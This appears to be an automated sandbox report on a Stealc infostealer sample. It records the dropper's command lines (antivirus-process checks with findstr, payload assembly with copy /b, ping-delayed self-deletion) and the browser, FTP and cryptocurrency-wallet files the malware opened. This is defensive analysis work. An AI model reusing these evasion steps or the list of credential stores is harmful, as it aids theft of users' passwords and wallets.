Source: Binary string: C:\Users\Administrator\Desktop\net8.0-windows7.0\Data\src\WalletsUpdater\WalletsUpdater\obj\Release\WalletsUpdater.pdb source: DocumentsFCFBGIDAEH.exe, 00000012.00000000.2561484417.0000000000012000.00000002.00000001.01000000.0000000B.sdmp, DocumentsFCFBGIDAEH.exe.10.dr, seed[1].exe.10.dr
Source: Binary string: softokn3.pdb@ source: softokn3.dll.10.dr, softokn3[1].dll.10.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.10.dr, vcruntime140[1].dll.10.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.10.dr, msvcp140.dll.10.dr
Source: Binary string: nss3.pdb source: nss3[1].dll.10.dr, nss3.dll.10.dr
Source: Binary string: mozglue.pdb source: mozglue.dll.10.dr, mozglue[1].dll.10.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.10.dr, softokn3[1].dll.10.dr
Binary contains a suspicious time stamp
Source: seed[1].exe.10.dr Static PE information: 0xF32C30E9 [Mon Apr 13 10:33:13 2099 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
PE file contains sections with non-standard names
Source: freebl3.dll.10.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.10.dr Static PE information: section name: .00cfg
Source: mozglue.dll.10.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.10.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.10.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.10.dr Static PE information: section name: .didat
Source: nss3.dll.10.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.10.dr Static PE information: section name: .00cfg
Source: softokn3.dll.10.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.10.dr Static PE information: section name: .00cfg

Persistence and Installation Behavior
barindex
Drops PE files to the document folder of the user
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\Users\user\DocumentsFCFBGIDAEH.exe Jump to dropped file
Drops PE files with a suspicious file extension
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Jump to dropped file
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\Users\user\DocumentsFCFBGIDAEH.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\seed[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the user directory
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\Users\user\DocumentsFCFBGIDAEH.exe Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\Users\user\DocumentsFCFBGIDAEH.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Uses ping.exe to sleep
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000 Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Memory allocated: 870000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Memory allocated: 23B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Memory allocated: 43B0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe TID: 4820 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\87551\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\87551 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: Milfs.pif, 0000000A.00000003.2407831136.00000000010D7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 5FVMCI6
Source: Milfs.pif, 0000000A.00000003.2407831136.00000000010D7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: b"(9)t6)"W}m#'$5wm6UL5^"%QNX6J4,-_&PVIIOA"&"*/YHQO1GB8X?!=*n)#U=Y3E6?Z)S5FVMCI6X#%>".SSRQGZTN4368NSEYFZ4YDM87WBJ0BDJIF9SSG
Source: DocumentsFCFBGIDAEH.exe, 00000012.00000002.2564510737.00000000006A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Process information queried: ProcessInformation Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Enables debug privileges
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: Milfs.pif PID: 6524, type: MEMORYSTR
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Taken Taken.bat & Taken.bat Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 87551 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "developmentplaintiffdisturbedconstruction" Flesh Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Horizontal + ..\Comparisons + ..\Evolution + ..\Frog + ..\Could + ..\Professor + ..\Prospect p Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Milfs.pif p Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsFCFBGIDAEH.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsFCFBGIDAEH.exe "C:\Users\user\DocumentsFCFBGIDAEH.exe" Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\user\DocumentsFCFBGIDAEH.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000 Jump to behavior
Source: file.exe, 00000000.00000003.1666983273.00000000029BB000.00000004.00000020.00020000.00000000.sdmp, Milfs.pif, 0000000A.00000000.1705589301.00000000003E6000.00000002.00000001.01000000.00000007.sdmp, Milfs.pif.1.dr, Wrote.0.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Queries volume information: C:\Users\user\DocumentsFCFBGIDAEH.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406805
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 10.3.Milfs.pif.114a000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000003.2413267832.000000000114A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2409165512.000000000108D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2407236092.00000000010D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2406991399.00000000010D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2407067168.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2407668359.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2413197746.000000000108D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2408597653.0000000001041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2407133823.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2409635221.0000000001141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2407831136.00000000010D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 10.3.Milfs.pif.114a000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000003.2413267832.000000000114A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2409165512.000000000108D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2407236092.00000000010D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2406991399.00000000010D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2407067168.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2407668359.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2413197746.000000000108D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2408597653.0000000001041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2407133823.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2409635221.0000000001141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2407831136.00000000010D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
